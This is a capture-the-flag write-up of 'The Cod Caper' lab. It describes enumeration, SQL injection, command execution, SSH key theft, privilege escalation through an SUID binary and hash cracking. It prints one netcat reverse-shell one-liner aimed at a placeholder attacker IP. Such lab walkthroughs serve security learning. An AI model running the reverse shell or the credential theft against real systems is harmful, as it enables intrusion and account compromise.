The Cod Caper | Pentesting

Host Enumeration

Lets run nmap scan to find open ports and the services running on them

Web Enumeration

Lets check the webpage.

Its a default Apache2 page, lets run gobuster to find hidden files and directories

Web Exploitation

Lets use Sqlmap to find more information.

Command Execution

Lets check the administrator.php page and login with the credentials we found.

Looks like we can run commands. Lets get a reverse shell on the machine, first we start a netcat listener.

Now lets run the reverse shell command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your-IP> 1234 >/tmp/f

We have a shell. Lets stabilize the shell.

Lets look at how many files are in the current directory.

Lets check if pingu still has his account on this machine.

Looks like he does.

Lets look for interesting files belonging to www-data.

Lets look at this interesting file

Looks like a password.

Lets now go get the private ssh key of pingu.

Lets cat the contents of id_rsaand copy it to our machine and call the file id_rsa.

Now lets set the permissions for the file and login with the password we found.

LinEnum

Lets use the second method, first on our machine lets cd into the directory where the LinEnum file is located and then start a http server on port 8000

Now lets go to the /tmp folder on the victim machine and download the file.

Now lets give it executable permissions and run the file.

Once we run the file we get a lot of information. Looking at the SUID files, we see an interesting one that is not common.

pwndbg

Binary-Exploitation: Manually

Binary-Exploitation: The Pwntools way

Binary Exploitation

Lets use the manual way

Lets cd into the /opt/secret directory and run the command to get the hash of the root user

Finishing The Job

We have the hash, lets copy it and save it on our machine in a file called hash and lets crack it using hashcat.

We have the password.